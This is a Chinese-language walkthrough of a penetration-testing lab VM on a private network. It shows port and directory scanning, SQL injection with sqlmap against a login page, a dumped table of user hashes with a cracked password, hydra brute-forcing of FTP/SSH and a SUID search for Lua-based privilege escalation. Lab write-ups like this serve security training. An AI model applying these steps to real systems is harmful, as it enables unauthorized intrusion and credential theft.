描述

image-20230203093736900

信息收集

存活

image-20230203093834184

1
2
靶机 192.168.169.230
kali 192.168.169.220

靶机扫描

image-20230203094223795

端口

1
2
3
4
5
6
7
8
PORT     STATE  SERVICE
20/tcp   closed ftp-data
21/tcp   open   ftp
22/tcp   open   ssh
80/tcp   open   http
110/tcp  closed pop3
443/tcp  closed https
8080/tcp closed http-proxy

访问

image-20230203100837068

ftp

image-20230203101045819

目录扫描

image-20230203101432672

CFIDE/Administrator/

image-20230203102611265

phpmyadmin/index.php

image-20230203102746175

website

image-20230203102832984

1
这些都是网页,感觉可以继续往下目录扫描

CFIDE website

image-20230203103331465

image-20230203103851170

一个登录框

1
http://192.168.169.230/CFIDE/Administrator/login.php

image-20230203104225460

  • 爆破或者注入

尝试sql注入

  • bp抓包,post注入

image-20230203104822388

image-20230203105238217

1
sqlmap -r 1.txt --dbs

image-20230203105314738

image-20230203105523435

image-20230203105733322

image-20230203110727344

1
2
3
4
5
id | password                         | username  |
+----+----------------------------------+-----------+
| 1  | 33a41c7507cy5031d9tref6fdb31880c | 0xBush1do |
| 2  | 69a41c7507ad7031d9decf6fdb31810c | asta      |
| 3  | 92ift37507ad7031d9decf98setf4w0c | 0xJin

解密

  • 只有一条解开
1
69a41c7507ad7031d9decf6fdb31810c  asta$$123

image-20230203130805406

登录

  • 网页登录,不能用
1
http://192.168.169.230/CFIDE/Administrator/login.php

image-20230203131035149

  • ssh 登录

image-20230203131218665

成功登录

image-20230203131352515

另一个用户

image-20230203131711288

1
2
P4SsW0rD****
不知后面的密码,使用crunch生成密码字典

image-20230203132206706

image-20230203132432555

  • 密码字典这个样子

image-20230203132528942

  • 使用hydra爆破

  • 进行ssh的密码爆破,但是爆破失败

  • ftp服务也是开启的,于是把服务换成了ftp

  • 登录ssh还是这个密码

image-20230203133841192

image-20230203133906536

提权

  • 找有root权限的suid文件
1
find / -perm -u=s -type f 2>/dev/null

image-20230203134120733

image-20230203134217046

1
2
3
来自百度

Lua 是一个小巧的脚本语言。Lua由标准C编写而成,几乎在所有操作系统和平台上都可以编译,运行。Lua并没有提供强大的库,这是由它的定位决定的。所以Lua不适合作为开发独立应用程序的语言。Lua脚本可以很容易的被C/C++代码调用,也可以反过来调用C/C++的函数,这使得Lua在应用程序中可以被广泛应用。不仅仅作为扩展脚本,也可以作为普通的配置文件,代替XML,Ini等文件格式,并且更容易理解和维护。一个完整的Lua解释器不过200k,在目前所有脚本引擎中,Lua的速度是最快的。这一切都决定了Lua是作为嵌入式脚本的最佳选择。很多应用程序使用LUA作为自己的嵌入式脚本语言,以此来实现可配置性、可扩展性。这其中包括魔兽世界、博德之门、愤怒的小鸟等。

漏洞利用

image-20230203134653024

image-20230203134741126